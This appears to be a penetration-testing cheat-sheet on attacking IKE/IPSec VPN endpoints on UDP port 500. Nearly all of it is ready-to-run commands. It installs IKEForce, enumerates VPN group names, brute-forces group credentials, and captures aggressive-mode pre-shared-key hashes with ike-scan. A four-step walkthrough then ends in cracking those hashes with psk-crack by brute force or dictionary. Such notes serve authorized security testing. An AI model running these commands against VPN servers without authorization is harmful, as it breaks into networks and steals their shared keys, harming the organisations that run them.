Links

500 - IKE

IKE is aprt of IPSec protocol, which is part of VPN's, it uses UDP port 500

IKEFORCE

Use IKEForce to enumerate or dictionary attack VPN servers.
Install:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1

ike-scan

ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
IKE Aggressive Mode PSK Cracking
  1. 1.
    Identify VPN Servers
  2. 2.
    Enumerate with IKEForce to obtain the group ID
  3. 3.
    Use ike-scan to capture the PSK hash from the IKE endpoint
  4. 4.
    Use psk-crack to crack the hash
Step 1: Identify IKE Servers (uses https://github.com/portcullislabs/udp-proto-scanner)
./udp-protocol-scanner.pl -p ike SUBNET/24
Step 2: Enumerate group name with IKEForce
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Step 3: Use ike-scan to capture the PSK hash
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
Some more advanced psk-crack options below:
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
Last modified 1yr ago